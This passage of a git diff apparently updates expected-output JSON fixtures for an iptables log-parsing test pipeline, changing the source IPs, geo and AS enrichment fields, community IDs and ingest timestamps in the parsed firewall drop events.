WINDOW=2857 RES=0x00 ACK URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 \ No newline at end of file diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json index cf2c0fbe842..0e53091d6e7 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json @@ -42,32 +42,17 @@ "id": "default" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 13041, - "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" - } - }, "port": 38842, "mac": "90:10:65:29:b6:2a", - "ip": "158.109.0.1" + "ip": "67.43.156.15" }, - "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=", + "community_id": "1:jc/7ajWLmm0xdpLA7mOyvas9TyE=", "transport": "tcp" }, "observer": { @@ -85,14 +70,14 @@ }, "related": { "ip": [ - "158.109.0.1", + "67.43.156.15", "10.4.0.5" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725458094Z", - "original": "\u003c161\u003eOct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:42.195706800Z", + "original": "\u003c161\u003eOct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" @@ -145,32 +130,17 @@ "id": "default" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 13041, - "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" - } - }, "port": 38842, "mac": "90:10:65:29:b6:2a", - "ip": "158.109.0.1" + "ip": "67.43.156.15" }, - "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=", + "community_id": "1:jc/7ajWLmm0xdpLA7mOyvas9TyE=", "transport": "tcp" }, "observer": { @@ -188,14 +158,14 @@ }, "related": { "ip": [ - "158.109.0.1", + "67.43.156.15", "10.4.0.5" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725463865Z", - "original": "\u003c6\u003e2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:42.195716800Z", + "original": "\u003c6\u003e2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" @@ -243,32 +213,17 @@ "id": "default" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 13041, - "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" - } - }, "port": 38842, "mac": "90:10:65:29:b6:2a", - "ip": "158.109.0.1" + "ip": "67.43.156.15" }, - "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=", + "community_id": "1:jc/7ajWLmm0xdpLA7mOyvas9TyE=", "transport": "tcp" }, "observer": { @@ -286,14 +241,14 @@ }, "related": { "ip": [ - "158.109.0.1", + "67.43.156.15", "10.4.0.5" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725466725Z", - "original": "2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:42.195726300Z", + "original": "2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" @@ -321,19 +276,19 @@ }, "destination": { "mac": "90:10:28:5f:62:24", - "ip": "192.0.2.83" + "ip": "192.168.2.83" }, "source": { "mac": "90:10:18:5a:89:2a", - "ip": "192.0.2.71" + "ip": "192.168.2.71" }, - "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", + "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:T79jBEYlbFhpnIGt2rOuzIv31hE=", + "community_id": "1:v5jWdgB//QU/ZfG9vivofYLpWjA=", "transport": "icmp" }, "@timestamp": "2021-01-08T03:37:09.000Z", @@ -342,14 +297,14 @@ }, "related": { "ip": [ - "192.0.2.71", - "192.0.2.83" + "192.168.2.71", + "192.168.2.83" ] }, "event": { "action": "deny", - "ingested": "2021-06-15T20:04:36.725469433Z", - "original": "Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", + "ingested": "2021-12-09T13:39:42.195732600Z", + "original": "Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "type": [ "denied", "connection" @@ -387,17 +342,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 17805, "mac": "90:10:9e:ec:2c:71", - "ip": "203.0.113.36" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:VD3aeZ6cGYX6uwOAUQ9NuxbobMI=", + "community_id": "1:mS1rlKt+I+dWD1dNPcASrH/J3Iw=", "transport": "tcp" }, "observer": { @@ -409,14 +382,14 @@ }, "related": { "ip": [ - "203.0.113.36", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725472111Z", - "original": "Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195737Z", + "original": "Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -453,15 +426,15 @@ "source": { "port": 47091, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.198" + "ip": "192.168.100.198" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:r9MnuXFtcWUKzbVQ2vXn7XSQ2Fg=", + "community_id": "1:iLlmyB6bkLDZ2y5VwrpHwVYUVC4=", "transport": "tcp" }, "observer": { @@ -473,14 +446,14 @@ }, "related": { "ip": [ - "198.51.100.198", + "192.168.100.198", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725474729Z", - "original": "Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195742Z", + "original": "Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -518,17 +491,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 59319, "mac": "90:10:9e:ec:2c:71", - "ip": "203.0.113.201" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:vgBSpDUKSSgxOm6Y52jw6tCgiN8=", + "community_id": "1:AXBuHRBBqw1ziE87Jkt8chnn/Hg=", "transport": "tcp" }, "observer": { @@ -540,14 +531,14 @@ }, "related": { "ip": [ - "203.0.113.201", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725477361Z", - "original": "Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195748100Z", + "original": "Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -585,17 +576,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 44181, "mac": "90:10:9e:ec:2c:71", - "ip": "203.0.113.246" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:PCNGbo6CtVQoE5Hch+6oMfbeTP4=", + "community_id": "1:i7/1jLJuoVUL8/PcL9r5bpJsKg0=", "transport": "tcp" }, "observer": { @@ -607,14 +616,14 @@ }, "related": { "ip": [ - "203.0.113.246", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725480004Z", - "original": "Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195753500Z", + "original": "Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -652,17 +661,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 64358, "mac": "90:10:76:e0:e2:d5", - "ip": "203.0.113.208" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:Wb/3DTwtWE8C20/hm2JpmBAhsro=", + "community_id": "1:xVgSZUAhVYBSzdOVqubsDgPK+04=", "transport": "tcp" }, "observer": { @@ -674,14 +701,14 @@ }, "related": { "ip": [ - "203.0.113.208", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725482632Z", - "original": "Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195757900Z", + "original": "Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -718,15 +745,15 @@ "source": { "port": 58830, "mac": "90:10:9e:ec:2c:71", - "ip": "198.51.100.160" + "ip": "192.168.100.160" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:+s7vkEgPnzTAoksA2Q0gAzgymfI=", + "community_id": "1:ZBKV474dyZ6IgnaMGTIwDQKBrHI=", "transport": "tcp" }, "observer": { @@ -738,14 +765,14 @@ }, "related": { "ip": [ - "198.51.100.160", + "192.168.100.160", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725485256Z", - "original": "Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195762900Z", + "original": "Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -785,15 +812,15 @@ "source": { "port": 51985, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.115" + "ip": "192.168.100.115" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6Pvyzf2+vqgsRxWx+eU9MXEhAFE=", + "community_id": "1:QpP5hsl26lIkI0SXiXDwdHu8wHc=", "transport": "tcp" }, "observer": { @@ -805,14 +832,14 @@ }, "related": { "ip": [ - "198.51.100.115", + "192.168.100.115", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725487863Z", - "original": "Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195767800Z", + "original": "Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -852,15 +879,15 @@ "source": { "port": 4099, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.167" + "ip": "192.168.100.167" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:g+bRFDuqViJEc5vzlOapz2LPhFo=", + "community_id": "1:7i2MLwBBY4Ew2vXQ9MEL+wtwDlA=", "transport": "tcp" }, "observer": { @@ -872,14 +899,14 @@ }, "related": { "ip": [ - "198.51.100.167", + "192.168.100.167", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725490673Z", - "original": "Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195772100Z", + "original": "Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -916,15 +943,15 @@ "source": { "port": 59287, "mac": "90:10:9e:ec:2c:71", - "ip": "198.51.100.19" + "ip": "192.168.100.19" }, - 